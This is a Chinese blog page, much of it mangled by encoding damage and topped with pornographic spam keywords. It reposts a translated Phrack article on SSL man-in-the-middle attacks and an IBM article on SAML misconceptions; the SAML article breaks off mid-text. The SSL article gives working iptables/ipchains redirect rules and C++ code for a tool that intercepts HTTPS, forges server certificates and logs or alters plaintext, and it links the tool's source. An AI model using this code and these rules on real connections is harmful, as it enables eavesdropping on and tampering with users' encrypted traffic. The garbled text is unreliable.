亚洲国产精品人人做人人爽,亚洲国产精品第一区二区三区,99亚洲乱人伦aⅴ精品

SSL�?X509

�W�笨 — Thu, 29 Sep 2005 01:40:00 GMT

作者：Stealth
��译�Q�nixe0n

http://www.linuxbyte.net/view.php?skin=art&ID=3320

��?

SSLv3的当前版本是3.1版，也被�U�CؓTLS。它提供了一�U�机�Ӟ��在网�l�上�q�行安全的数据传输。它据说能够满��所有的安全需要，比如�Q�你的银行帐��L��理�?

但是在这里我��告诉你�Q�这实际上是不可能的�?

在本文中�Q�我首先��对SSL做一些介�l�，�q�是非常重要的。不�q�，�q�里我们不会介绍诸如SSL是怎样实现�q�接的等深层问题�Q�如果有兴趣�Q�可以自己参考参考资料�?

1.��Z��么��用SSL

SSL是�ؓ了实现网�l�数据传输中的如下目的设计的�Q?

机密�?

�q�是通过�Ҏ��据进行加密实现的�Q�在�q�行SSL握手�Ӟ��SSL选择一�U�对�U�算法对数据�q�行加密�Q�然后才在网�l�上传输数据。SSL使用的加密算法有好多�U�，如果某种��法被新的网�l�攻��L��法识��_��它只要选择另外的算法就可以了�?

消息的完整�?

SSL使用一�U�很健壮的信息验证码(Message Authentication Code)�Q�例如：SHA-1�Q�验证码被放在数据包的后部，�q�且和数据一块被加密。这��P��如果数据被修改，其散列值就无法和原来的验证码匹配，从而能够检��出数据是否被修攏V��MAC同时也被用于保护SSL�q�接免受�q�扰�?

保护数据免受重放��d��(replay-attack)

SSL使用序列��h��保护通讯方免受报文重放攻凅R��这个序列号被加密后作�ؓ数据包的负蝲。在整个SSL握手中中�Q�都有一个唯一的随机数来标记这个SSL握手�Q�这样重放便无机可乘�?

免受recorder��d��(reorder-attack)

上面所说的序列号也可以防止��d��者记录数据包�q�以不同的次序发送�?

端点验证

使用X509(当前版本�?)证书�Q�SSL支持客户和服务器的验证。关于服务器的连接，我们�E�后��深入介�l��?

�q�听��h��g��很安全，但是看了本文介绍的程序，��就不这么想了�?不过�Q�我们还不能打破客户端的验证)

使用本文介绍的攻��L��法，我们��可以看到SSL�q�接上所有明文数据，�Ҏ��我们的需要修改传输的数据�Q�对数据�q�行中��发送，以错误的�ơ序发送甚至丢弃我们不需要的报文。这�U�攻��L��法就是所谓的途中人攻�?man in the middle attack�Q�或者中间�h��d��)�?

2.X509数字证书

X509数字证书是SSL的一个组成部分。在SSL握手�q�程中，服务器向客户发送自��q��数字证书。一个X509数字证书包括发行者的识别�?Distinguished Name)、主�?Subject)的识别名、一个版本号和序列号、选择的算法、密钥的有效期时间窗�Q�还有主体的公钥�?

��M��(subject)是这个证书包含实体的名，证书中的公钥属于��M��(Subject)。在�q�_��的X509数字证书中，没有标志DNS名的域。通常�Q�CN域被影射为DNS名，但是�q�只是一个客户和数字证书的实体必��都认可的协议�?

发行�?issuer)是��用自��q��U�钥�{�֏��q�个数字证书。它叫做数字证书中心(Certificate Authority,CA)�?

让我们看一个X509数字证书�Q?

stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text
Certificate:
Data:
Version: 1 (0x0)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=EU, ST=segfault, L=segfault,
O=www.segfault.net/Email=crew@segfault.net
Validity
Not Before: Nov 19 01:57:27 2000 GMT
Not After : Apr 5 01:57:27 2028 GMT
Subject: C=EU, ST=segfault, L=segfault, O=www.segfault.net,
CN=www.segfault.net/Email=crew@segfault.net
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:cd:64:2a:97:26:7a:9b:5c:52:5e:9c:9e:b3:a2:
e5:f5:0f:99:08:57:1b:68:3c:dd:22:36:c9:01:05:
e1:e5:a4:40:5e:91:35:8e:da:8f:69:a5:62:cf:cd:
70:dc:ca:d2:d7:92:03:5c:39:2a:6d:02:68:91:b9:
0d:d1:2c:c7:88:cb:ad:be:cc:e2:fa:03:55:a1:25:
47:15:35:8c:d9:78:ef:9f:6a:f6:5f:e6:9a:02:12:
a3:c2:b8:6a:32:0f:1d:9d:7b:2f:65:90:4e:ca:f7:
a0:e4:ae:55:91:09:e4:6e:01:e3:d1:71:1e:60:b1:
83:88:8f:c4:6a:8c:bb:26:fd
Exponent: 65537 (0x10001)
Signature Algorithm: md5WithRSAEncryption
7d:c7:43:c3:71:02:c8:2f:8c:76:9c:f3:45:4c:cf:6d:21:5d:
e3:8f:af:8f:e0:2e:3a:c8:53:36:6b:cf:f6:27:01:f0:ed:ee:
42:78:20:3d:7f:e3:55:1f:8e:f2:a0:8e:1a:1b:e0:76:ad:3e:
a0:fc:5b:ce:a6:c4:32:7b:64:f2:a4:0f:a3:be:a1:0e:a7:ca:
ed:67:39:07:65:6b:cc:e7:5a:9a:b0:3a:f3:5c:1a:18:d4:dd:
8c:8d:5a:9e:a0:63:e0:7d:af:7c:97:7c:89:17:0f:25:2f:a7:
80:d3:02:dc:88:7a:12:64:ec:8a:ff:e4:62:92:2e:7f:75:03:
82:f1

要点�Q?

Issuer: C=EU, ST=segfault, L=segfault,
O=www.segfault.net/Email=crew@segfault.net

C、ST、L、O和Email构成发行者的识别�?distinguished name,DN)�?

Subject:C=EU, ST=segfault, L=segfault, O=www.segfault.net,
CN=www.segfault.net/Email=crew@segfault.net

证书可以�׃��个公开的CA�{�֏��Q�或者由自己�{�֏�(��是所谓的自签发证�?。在�q�个例子中的证书��是��p��q��发的�?

�q�是没有被拦截的原始数字证书。后面我们将看一下如果有人拦截连接看��h��会怎样�?

当你的浏览器�?A style="COLOR: #003793" target=_blank>https://segfault.net的连接时�Q�这个证书会在SSL握手期间�q�行交换。证书中保存的公钥就被用于会话的加密�?

��Z��h��pretty good层的安全性，证书应该�׃��个CA(你自己或者一个公开的CA)�{�֏��Q�客��h��q�个CA的公钥用于检查这个证书的合法性。如果客��h��有这个CA的公钥，��览器就会提�C�用��h��受还是拒�l�这个证书。这对于交互式的客户�E�序是必��ȝ��Q�不�q�事实上对于太多的站点发行的证书�Q�客户�ƈ没有他们的公钥来��查证书的合法性。对于普通的交互式客��L��?例如�Q�Netscape��览�?�Q�这�U�情况就可能造成使SSL�q�接失去意义�?

3.拦截

�l�g��所�q�ͼ�X509数字证书是SSL的重要环节。它的�Q务就是保证客户和服务器之间的会话�Q��ƈ且它使用的密钥是正确的�?

现在�Q�想象一下我们伪装一个证书，�q�对一个SSL�q�接�q�行转发会怎么栗��?

�q�值得一试。我们的座右铭是“teile und herrsche�Q�哪国英文？�Q�”，�q�里我们必须解决两个问题�Q?

a.劫持�q�接然后�q�行转发�?

b.伪造一个数字证书，让客户以��Z��是和真正的服务器通讯�?

a+b��是通常所说的途中�?man in the middle�Q�又可以叫做中间�?��d��。从理论上X509应该能够��L��q�种��d��Q�但是��^常的交互式客��L��?例如�Q�Netscape��览�?所采取的证书检查方式�ɘq�种��d��方式有机可乘�?

�W�一个问题很好解冻I��假设我们位于客户和服务器之间�Q�我们只要在我们的防火墙上略施小�?最好是在Linux或者BSD�?P)把连接重定向��可以了�Q�另外我们把自己的程序称为mimd。对于Linux-2.2.x(ipchains)版本的内核，使用如下规则��可以截获https包文�Q�把它们导入输入(input)�?

ipchains -A input -s 0/0 -d 0/0 443 -j REDIRECT 10000 -p tcp

对于Linux-2.4.x内核(iptables)�Q�可以��用如下规则：

iptables -t nat -A OUTPUT -p tcp --sport 1000:3000 -dport 443\
-j REDIRECT --to-port 10000

要给出SSL客户的源端口�Q�如果我们忽略了�q�一点，mimid��׃��q�入一个无限的循环(iptables��会重定向已�l�重定向的流�?。mimd被绑定到8888端口�Q�它不匹配这条规则。你的物理位�|�不必位于SSL�q�接双方中间�Q�位于服务器局域网内或者客��h��局域网内就��_��了。��用ARP��可以很好地完成�q�个工作�Q�甚臌��防火墙规则都不必修改�?

有了�q�些重定向规则，我们��可以着手徏立的工具了。目标地址可以使用操作�pȝ��的API扑ֈ�(getsockopt())。这个工具中的NS_Socket::dstaddr()函数在绝大多数操作系�l�中都可以成功编译。��用这个小�E�序�Q�我们可以看到通过�q�接的数据�?

��Z��使这个小�E�序能够看到�q�接的明文数据，我们需要��用SSL_accpet()和SSL_connect()调用。首先，我们需要调�?accept()接受客户�E�序的连接，接着使用SSL_connect()向真正的服务器发赯��接请求。然后，执行真正的SSL_accept()。假设我们已�l�完成了初始化内容，比如�Q�加载密钥文件等。这�Ӟ��在客��L��Q�客��L��?例如�Q�浏览器)��׃��询问用户是否接受�q�个工具的证书�?

但是�Q�用��h��然可以轻松认��个证书是伪造的�Q�因��Z��在浏览A公司的网站时�Q�却收到B公司或者途中人的证书�Q�必然会引�v他的怀疑�?

下面我们��会解决�q�个问题。SSL_connect()和SSL_accept()的顺序应该正��，我将对其�q�行解释�?

4.DCA

如果用户接受伪造的证书�Q�我们就可以使用SSL_read()��d��q�接的明文数据，�q��用SSL_write()把它们�{发到真正的服务器。现在我们就着手解军_��何伪造证书的问题�?

��C��Q�在SSL_connect()要先于SSL_accept()调用�Q�这��h��务器可以把我们看做合法的用户�Q�和我们�q�行正常的SSL握手�Q�从而我们可以得到服务器的证书�?

下面我们看一下实际的代码�Q?

//��d��Q�等待iptables劫持的连�?
while ((afd = accept(sfd, (sockaddr*)&from, &socksize)) >= 0) {

// 获得�q�接真正�?
// 目的地址
if (NS_Socket::dstaddr(afd, &dst) < 0) {
log(NS_Socket::why());
die(NULL);
}

...

++i;//一个全局变量记录被劫持连接的数量
if (fork() == 0) {//fork��Z��个进�E�，由子�q�程处理被劫持的�q�接�Q�父�q�程�l�箋�{�待�q�接

// 成�ؓ真正目的服务器的客户
if ((sfd2 = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
log("main::socket");
die(NULL);
}

if (NS_Socket::bind_local(sfd2, 8888+i, 0) < 0) {
log(NS_Socket::why());
die(NULL);
}//把套接字�l�定到本地端口，可以同时处理多个�q�接

// 向真正的服务器发赯��?
if (connect(sfd2, (struct sockaddr*)&dst,
sizeof(dst)) < 0) {
log("main::connect");
die(NULL);
}

...

client->start();
client->fileno(sfd2); // 使用sfd2和真正的服务器进行连�?

// �q�行SSL握手以徏立SSL�q�接
if (client->connect() < 0) {
log("Clientside handshake failed. Aborting.");
die(NULL);
}

现在�Q�我们和真正服务器之间的SSL握手已经完成。注意，在源代码中，SSL_connect()和SSL_accept()两个函数都被��装��C��client和server对象中。现在，我们可以准备自己作�ؓSSL服务器和SSL客户之间的连接了�Q?

// 服务器端

server->start(); // 建立SSL对象
server->fileno(afd); // 使用afd套接字接受客戯��?

我们�q�行真正的伪造，调用SSL_accept()�Q?

if (enable_dca)
NS_DCA::do_dca(client, server);

动态证书装�?Dynamic Certificate Assembly)函数do_dca()�q�行如下工作�Q?

�l�一个几乎是�I�白的证�?除了C域之外，其它RDN全部为空)�Q�do_dca()使用和服务器�q�行SSL握手获得的内容填充剩下的RDN域。我们抽取L、ST、O、CN、OU和EMAIL域，把它们放到我们自��q��证书�Q�然后把�q�个证书昄��l�SSL客户。�ؓ了完成这个工作，do_dca()使用了字�W�串解析(抽取RDN�?�Q��ƈ调用OpenSSL提供的using X509_()函数�?

在证书发行者的OU�?OrganizationalUnit�Q�原来�ؓ�I?我们填上一个空��|��q�个�I�格不会在SSL客户�E�序的窗口中昄��出来�Q�但是可以把伪造的新证书和来自公共CA的证书区别开。当�q�个伪造的证书到达SSL客户�E�序之后�Q�客��L��序就会提�C�用��h��否接收这个证书，用户看来�q�个证书来自一个已知的可信�ȝ��CA(实际上，OU域多了一个空�?P�Q�但是用��L��不出�?�Q�而对于SSL客户�E�序来说�Q�它知道�q�个证书不是来自用户看到的CA(差一个空格呢:P)�Q�因此找不到�q�个CA的公钥，只好提示用户�Q�让用户定夺是否接受�q�个证书。这�Ӟ��被愚弄的用户一般会接受�q�个证书�?

现在我们可以修改发行者的subject�?CN...)�Q�把前面的X509证书变成自签�?self-signed)证书。用��h��法知道自�{�֏�证书是伪造的�?

然后�Q�把被重新装配的证书昄��l�客��P��

// do SSL handshake as fake-server
if (server->accept() < 0) {
log("Serverside handshake failed. Aborting.");
die(NULL);
}

ssl_forward(client, server);

ssl_forward()函数只是循环调用SSL_read/SSL_write函数�Q�记录传输的明文数据。我们也可以随心所�Ʋ地修改传递的数据�?

下面在mimd�Ȁ�z�M��?没有使用-I选项)�Q�我们��用cf取回来自https服务器的X509证书�Q?

stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, C=EU, ST=segfault, L=segfault,
O=www.segfault.net, OU= /Email=crew@segfault.net
Validity
Not Before: Mar 20 13:42:12 2001 GMT
Not After : Mar 20 13:42:12 2002 GMT
Subject: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net,
CN=www.segfault.net/Email=crew@segfault.net
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:d4:4f:57:29:2c:a0:5d:2d:af:ea:09:d6:75:a3:
e5:b6:db:41:d7:7f:b7:da:52:af:d1:a7:b8:bb:51:
94:75:8d:d4:c4:88:3f:bf:94:b1:a9:9a:f8:55:aa:
0d:11:d6:8f:8c:8b:5b:b5:db:03:18:7e:7a:d7:3b:
b0:24:a9:d6:ba:9a:a7:bb:9b:ba:78:50:65:4b:21:
94:6f:83:d4:de:16:e4:8b:03:f2:97:f0:0b:9b:55:
ed:aa:d2:c3:ee:66:55:10:ba:59:4d:f0:9d:4e:d4:
b5:52:ff:8c:d9:75:c2:ae:49:be:63:57:b9:48:36:
ca:c2:07:9d:ba:32:ff:d6:e7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Key Identifier:
4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
X509v3 Authority Key Identifier:
keyid:4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
DirName:/C=US
serial:00

X509v3 Basic Constraints:
CA:TRUE
Signature Algorithm: md5WithRSAEncryption
b7:7d:5a:c7:73:19:66:aa:89:25:7c:f6:bc:fd:7d:82:1a:d0:
ac:76:93:72:db:2d:f6:3b:e0:88:5f:1d:6e:7c:25:d7:a2:de:
86:28:38:90:cf:fe:38:a0:1f:67:87:37:8b:2c:f8:65:57:de:
d1:4c:67:55:af:ca:4c:ae:7b:13:f2:6f:b6:64:f6:aa:7f:28:
8b:2f:21:07:8f:6d:7e:0c:3f:17:b1:69:3a:ea:c0:fb:a2:aa:
f9:d6:a6:05:6d:77:e1:e6:f0:12:a3:e6:ca:2a:73:33:f2:91:
e1:72:c8:83:84:48:fa:fe:98:6c:d4:5a:ab:98:b2:2e:3c:8a:
eb:f2

比较�Ȁ�z�mimd前后两个证书�Q�你可以发现两个证书的公钥是不同的，后面�q�个证书的公钥实际是mimd自己的公钥。C域包含US和EU�Q�这些信息会在Netscape��览器中昄��Q�和原来的证书没有什么不同。注意到�q�个证书的OU域了吗？原来的证书�ƈ没有�q�个域，而新的证书中�q�个域的是一个空根{��新证书的发行者信息是来自原来的数字证书。这个证书不再是由某个公开CA�{�֏�的，变成了一个自�{�֏�(self-signed)的证书�?

下面我们使用-I选项重新启动mimd�Q�这�ơ我们��用被截获证书的Subject来填充伪造证书的Issuer�Q��伪造证书变成自�{�֏�证书�?

stealth@lydia:sslmim> ./cf segfault.net 443|openssl x509 -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=US, C=EU, ST=segfault, L=segfault,
O=www.segfault.net, OU= , CN=www.segfault.net/Email=crew@segfault.net
Validity
Not Before: Mar 20 13:42:12 2001 GMT
Not After : Mar 20 13:42:12 2002 GMT
Subject: C=US, C=EU, ST=segfault, L=segfault, O=www.segfault.net,
CN=www.segfault.net/Email=crew@segfault.net
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
00:d4:4f:57:29:2c:a0:5d:2d:af:ea:09:d6:75:a3:
e5:b6:db:41:d7:7f:b7:da:52:af:d1:a7:b8:bb:51:
94:75:8d:d4:c4:88:3f:bf:94:b1:a9:9a:f8:55:aa:
0d:11:d6:8f:8c:8b:5b:b5:db:03:18:7e:7a:d7:3b:
b0:24:a9:d6:ba:9a:a7:bb:9b:ba:78:50:65:4b:21:
94:6f:83:d4:de:16:e4:8b:03:f2:97:f0:0b:9b:55:
ed:aa:d2:c3:ee:66:55:10:ba:59:4d:f0:9d:4e:d4:
b5:52:ff:8c:d9:75:c2:ae:49:be:63:57:b9:48:36:
ca:c2:07:9d:ba:32:ff:d6:e7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Key Identifier:
4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
X509v3 Authority Key Identifier:
keyid:4A:2C:50:3A:50:4E:96:3D:E6:C7:4E:E8:C2:DF:41:F0:0A:26:F0:DD
DirName:/C=US
serial:00

X509v3 Basic Constraints:
CA:TRUE
Signature Algorithm: md5WithRSAEncryption
b7:7d:5a:c7:73:19:66:aa:89:25:7c:f6:bc:fd:7d:82:1a:d0:
ac:76:93:72:db:2d:f6:3b:e0:88:5f:1d:6e:7c:25:d7:a2:de:
86:28:38:90:cf:fe:38:a0:1f:67:87:37:8b:2c:f8:65:57:de:
d1:4c:67:55:af:ca:4c:ae:7b:13:f2:6f:b6:64:f6:aa:7f:28:
8b:2f:21:07:8f:6d:7e:0c:3f:17:b1:69:3a:ea:c0:fb:a2:aa:
f9:d6:a6:05:6d:77:e1:e6:f0:12:a3:e6:ca:2a:73:33:f2:91:
e1:72:c8:83:84:48:fa:fe:98:6c:d4:5a:ab:98:b2:2e:3c:8a:
eb:f2

比较�q�两个伪造的证书�Q�你会发现后面这个的Issuer中包含CN域，�q�是��Z��加强伪造的效果:P�?

�l�论

�l�g��所�q�ͼ�使用交互式客��L��序在�|�络上冲��的用户无法知道遭到了途中人攻击，因�ؓ他们无法分��L公司使用未知的CA(company uses unknown CA)的提�C�Z��息是真的�q�是自己遭到了途中人攻凅R��而且�Q�即使他以前曄��览�q�这个站点�ƈ保存了它的数字证书，也仍然可能掉入圈�?�q�记得OU域的�I�格吗？:P)。对于一些机警的用户�Q�把伪造的证书变成自签发证书将会打消他们的疑虑�?

本文使用separate-ports的方式断开了SSL�q�接�Q�但是在一�U�情况下(upward negotiation)无法使用mimd。SSL使用一个关键词把前面的明文数据��变成SSL数据��传输。这个问题��用MSG_PEEK可能可以解决�Q�他�?作�?正在研究�?P

参�?

[1] "SSL and TLS" Designing and Building Secure Systems
Eric Rescorla, AW 2001

A must-read if you want/need to know how SSL works.

[2] "Angewandte Kryptographie"
Bruce Schneier, AW 1996

THE book for crypto-geeks. I read the german version,
in english its Applied Cryptographie

[2] various openssl c-files and manpages

[3] http://www.cs.uni-potsdam.de/homepages/students/linuxer/sslmim.tar.gz
A DCA implementation, described in this article;
also contains cf tool.

[4] In case you cannot try mimd on your local box, view
a snapshot from a mim-ed session provided by TESO:
http://www.team-teso.net/ssl-security.png

原文来源�Q�Haaaang on snoopy, snoopy hang on. (SSL for fun and profit) phrack Volume 0x0b, Issue 0x39

�W�笨 2005-09-29 09:40 发表评论

了解安全性断�a�标记语言

�W�笨 — Thu, 29 Sep 2005 01:20:00 GMT

了解安全性断�a�标记语言

�U�别: 中��

http://www-128.ibm.com/developerworks/cn/xml/x-samlmyth/

Frank Cohen
创始�? PushToTest
2003 �q?10 �?

2003 �q�初�Q�OASIS ��组批准了安全性断�a�标记语言�Q�Security Assertion Markup Language�Q�SAML�Q�规范。由于来�?25 家公司的 55 名专家参与了该规范的制定�Q�因此�h们会认�ؓ SAML 能做��M��事情�Q��ƈ且能被很好地理解。但事实�q��如此�Q��Y件开发社区存在着很多�?SAML 的误解。在本文中，Frank Cohen 详细说明�q�澄清了有关 SAML 的很多不实说法和误解�?/BLOCKQUOTE>
作�ؓ一个新生事物，新的安全性断�a�标记语言�Q�SAML�Q�规范正在被��Z��拿来与现有的单点��d��技术、认证服务和目录服务�q�行比较。SAML 是第一个可能成为多个认证协议的规范以利�?Web 基础�l�构�Q�在�q�种 Web 基础�l�构中，XML 数据�?TCP/IP �|�络上通过 HTTP 协议传送）�?/P>
OASIS ��组开�?SAML 的目的是作�ؓ一�U�基�?XML 的框�Ӟ��用于交换安全性信息。SAML 与其它安全性方法的最大区别在于它以有兛_��个主体的断言的�Ş式来表述安全性。其它方法��用中央认证中心来发放证书�Q�这些证书保证了�|�络中从一点到另一点的安全通信。利�?SAML�Q�网�l�中的�Q何点都可以断�a�它知道用��h��数据块的�w�䆾。然后由接收应用�E�序作出军_��Q�如果它信�Q该断�a��Q�则接受该用��h��数据块。�Q何符�?SAML 的��Y件然后都可以断言对用��h��数据的认证。对于即��出现的业务工作��?Web 服务标准�Q�在该标准中�Q�安全的数据需要流�l�几个系�l�才能完成对事务的处理）而言�Q�这很重要�?/P>
��管 SAML 刚刚被批准没多久�Q�但是却有许多有�?SAML 的不实说法和误解要澄清。我认�ؓ�Q�如果您真正了解了当今的某个新兴标准�Q�那么它肯定已经�q�时了�?/P>
本文讨论了有�?SAML 的一些比较常见的不实说法和误解�?/P>
误解�Q�SAML 是一个完整的�w�䆾��理解决�Ҏ��?/SPAN>
SAML 作�ؓ�w�䆾��理解决�Ҏ��中服务器之间的通信协议发挥了重要作用；但是�Q�SAML �q�不是完整的解决�Ҏ��。在信息�pȝ��安全性领域，�q�来出现�?�w�䆾��理是一个新术语�Q�它�늛�了下面这些计��领域：

准备�Q�provisioning�Q?/B>�?��新用户��d��C��业内部信息系�l�和外部合作伙伴信息�pȝ��的网�l�操作系�l�目录和应用�E�序服务器目录中�?
密码��理�?使用戯��够用一�l�凭证登录到公司的信息系�l�。此外，使用戯��够自��q��理其密码、用户帐��h��据和�Ҏ��?
讉K��控制�?使系�l�能够识别用��L��的安全性策略。例如，某项安全性策略防止某个�h更改他或她的职位�Q�但能将职位更改��h��发送给��h��相应权限的�h�?

SAML 是两台服务器需要共享认证信息时使用的协议规范。SAML 规范中没有�Q何内�Ҏ��供了实际的认证服务，认证服务是由商业目录服务器提供的�?/P>
不实说法�Q�企业之间的 Web 单点��d��很好理解�q�且易于实现�?/SPAN>
SAML 是旨在减��构建和操作信息�pȝ��Q�这些系�l�在许多服务提供者之间相互操作）所��p��成本的众多尝试之一。在当今竞争�Ȁ烈且�q�速发展的环境中，出现了通过��览器和支持 Web 的应用程序�ؓ用户提供互操作性的企业联合。例如，旅游�|�站允许用户不必�q�行多次��d��卛_��预订机票和租车。今天，一大群软�g开发�h员、QA 技术�h员和 IT �l�理都需要处理复杂的和不可靠的后端系�l�，�q�些�pȝ��提供了企业之间的联合安全性�?/P>
在典型的支持 Web 的基��l�构中，�q�行业界领先的企业系�l�的软�g需要处理权限服务器之间的浏览器重定向、服务器域之间的 HTTP post 命��o、公钥基��l�构�Q�public key infrastructure�Q�PKI�Q�加密和数字证书�Q�以及声明�Q何给定用��h��l�的信�Q�U�别的相互同意（mutually agreed-upon�Q�机制。SAML 向��Y件开发�h员展�C�Z��如何表示用户、标识所需传送的数据�Q��ƈ且定义了发送和接收权限数据的过�E��?/P>
不实说法�Q�SAML 是一个复杂的设计�?/SPAN>
SAML 为那些需要在 Web 基础�l�构�Q�XML/HTTP/TCP�Q�上设计和构建可伸羃联合�pȝ��的系�l�架构设计师提供了一个蓝图。即使您军_��不��?SAML�Q�但 SAML 规范�q�是回答了许多设计问题，�q�些问题是�Q何系�l�架构设计师在构建可互操作的且支�?Web 的系�l�时必须回答的�?/P>
作�ؓ一个示例，误��虑用来��权限请求编码成 XML ��h��?SAML 断言机制。SAML 定义了六�c�语句：

认证�Q�Authentication�Q�：��M��已登录。例如，用于认证�?SAML 断言看�v来可能象下面�q�样�Q?

fcohen@pushtotest.com logged in at 2003-02-06T19:22:09Z

属性（Attribute�Q�：标识��M��的特性。例如，fcohen@pushtotest.com 拥有 Admin 角色�?

权限军_��Q�Authorization decision�Q�：声明允许某个��M��Ҏ��个资源执行操作。例如，fcohen@pushtotest.com 被授�?GET http://www.pushtotest.com/ptt/kits/index.html�?

断言属性（Assertion attribute�Q�：一个可选机�Ӟ��使行业团体能够定义特定于其行业的属性�?

此外�Q�SAML 定义了由某个断言中的语句�׃�n的断�a�的属性，包括�Q?/P>
版本属性（Version attribute�Q�：标识了断�a�所遵��@�?SAML 规范的主版本和次版本�?

SAML �q�定义了可选的 条�g元素以限制权限请求的有效性。例如，如果 SAML 标记 NotBefore �?NotOnOrAfter 指定的以 UTC �~�码的日期，那么它可能是有效的�?

最后，SAML 定义了一�?XML �{�֐��Q�XML Signature�Q?/B>元素以标识认证中心。该元素可以包含一个带有公钥、到期日和��用策略的 X509 证书。XML �{�֐��q�包含签名值本�w�，�{�֐�值是��p��证中心�ؓ元素内容生成的。可以��?X509 证书中权威机构的公钥信息来验证签名。通常�Q�SAML 的复杂性在于部�|�基�?SAML 的��Y�Ӟ��以及讄��公钥基础�l�构�Q�PKI�Q�环境和数字证书�?

误解�Q�SAML 为大多数行业预定义了所有属性含义�?/SPAN>
SAML �q�未��Z�Q何行业定义属性含义。而是定义了一个名�U�空间机�Ӟ��行业团体可以使用该名�U�空间机制来为其特定行业定义属性。例如，在航�I��业中�Q�SAML 属�?role:mechanic 定义了飞机的机械师。系�l�两端的各方需要分别就 SAML 使用的名�U�空间达成一致�?

SAML 规范标识自己的名�U�空间来限定 SAML 属性和元素。例如，名称�I�间 "urn:oasis:names:tc:SAML:1.0:action:ghpp" 定义�?SAML 操作中��用的 get/head/put/post http 操作。如果该 SAML 名称�I�间的格式看��h��有点古怪，那么�q�可能是因�ؓ SAML 名称�I�间未遵�?SOAP �?XML-RPC 中的传统 XML 名称�I�间格式�Q�XML 名称�I�间�?URI�Q�SAML 使用 URI �?URN 变体�Q�而其它名�U�空间则使用 URL 变体�?

不实说法�Q�SAML 是一个认证权威机构�?/SPAN>
SAML 是一个在服务器之间��用的认证协议。您仍然需要能帮助您实际登录的某些东西。SAML 所能说的只是“您已经��d��了（you have logged in�Q�”。例如，�?LDAP 服务器对一个用戯��行认证时�Q�认证权威机构是 LDAP 服务�?�?即�� LDAP 服务器可能正在��?SAML 来传送认证�?

在完整的认证�pȝ��中，您仍需要编写策略决�{�点�Q�以��定用户是否可以讉K�� Web ��面。此外，您还需要编写策略强制实施点�Q�enforcement point�Q�。这是一个接收权限、检查角色和权限�Q�然后做出断�a��?servlet 或应用程序。有几家公司提供了商业策略决�{�点和策略强制实施点解决�Ҏ��Q�这些公司包�?Oblix、Netegrity、IBM 和许多其它公司�?/P>
误解�Q�在认证需要传输大量数据的 Web 环境中，SAML 不能很好地工作�?/SPAN>
当权限请求对�?HTTP 重定向而言太长�Ӟ��SAML 定义了一�U?助诊文�g�Q�artifact�Q?/B>机制。SAML 助诊文�g的长度�ؓ 42 字节�Q�它包含一个类�?代码 �?长度�?20 个字节的源标识，以及长度�?20 个字节的随机敎ͼ�服务器用它来查找断言。源服务临时存储断言。目标站�Ҏ��收断�a��Q�然后从源站点上的助诊文件直接抽出所需的数据。这允许两台不同的安全性服务器使用助诊文�g�?

不实说法�Q��用重播技术可以轻易地�ȝ�� SAML�?/SPAN>
重播��d��是这样一�c�L��击：它可以拦截有效的消息�Q�然后再��该消息重播回服务。重播攻��d��用于造成数据完整性问题以及拒�l�服务攻凅R�?

SAML 提供了避免重播攻�ȝ��保护。SAML 要求在传输断�a�和消息时使用 SSL 加密�Q�以专门防止断言被拦截。此外，SAML 提供了数字签名机�Ӟ��该机制��断言��h��有效旉��范围�Q�以防止断言以后被重播�?/P>
最后，助诊文�g概要��h��其它两个重播对策�Q?/P>

SAML 源站点只��断�a��q�回�l�接收助诊文件的��h��者�?
SAML 源站点在�W�一�ơ��用助诊文件后会擦除其助诊文�g到断�a�的映��，从而��得重播的助诊文�g无效�?

误解�Q�SAML 定义了发现过�E�以查找认证权威机构�?/SPAN>
SAML 未定义�Q何机制来查找接受 SAML 断言的目标站炏V�?/P>
SAML 定义了一�U�用于认证的推（push�Q?/B>机制�Q�用��L��录到源站点，然后该站点向目标站点发送一个断�a�。该�q�程需要源站点和目标站点之间进行数字签名。在 Web 环境中，��览器将表单公布�Q�post�Q�到目标站点�Q��ƈ且在一个隐藏的表单变量中包含一个用 Base64 �~�码的签名和断言�?

��来�?SAML 规范有可能包含发现机制�?/P>
不实说法�Q�SAML 不能处理匿名或访客（guest�Q�访问�?/SPAN>
SAML 没有用于提供匿名认证的功能。请考虑�q�样一�U�方案，其中某个�|�站允许您��用合作伙伴网站的功能�Q�但是不允许合作伙伴站点知道您是谁。SAML 未提供这��L��功能。让 SAML 处理匿名或访客访问是可能的，但是�q�要求参与的企业��其自己的匿名访问或访客授权讉K��的约定达成一致�?/P>
不实说法�Q�SAML 要求在客��h��端和服务器端都有 SSL 证书�?/SPAN>
SAML 构徏在需要公钥基��l�构�Q�PKI�Q�的基础之上�Q�以提供数字�{�֐��?SAML 断言的加密。所以，PKI ��h��的不�?SAML 全都有�?/P>
SAML 是最先需要��U�程度的�l�粒度安全性的协议中的一个；例如�Q�XML 密钥��理规范�Q�XML Key Management Specification�Q�XKMS�Q�提供的安全性将用于认证 SAML 断言。同�Ӟ��通过要求使用 HTTP Basic �?HTTP 客户机端认证�?SSL 客户机端证书认证�Q�SAML �?SAML 助诊文�g提供了安全性。然后只��助诊文件发送给期望的请求者，在检索到助诊文�g后则删除它�?/P>
误解�Q�SAML 是雾�Ӟ��vaporware�Q�指已宣布但�q�未实现�Q�；�q�没有�h要实现它�?/SPAN>
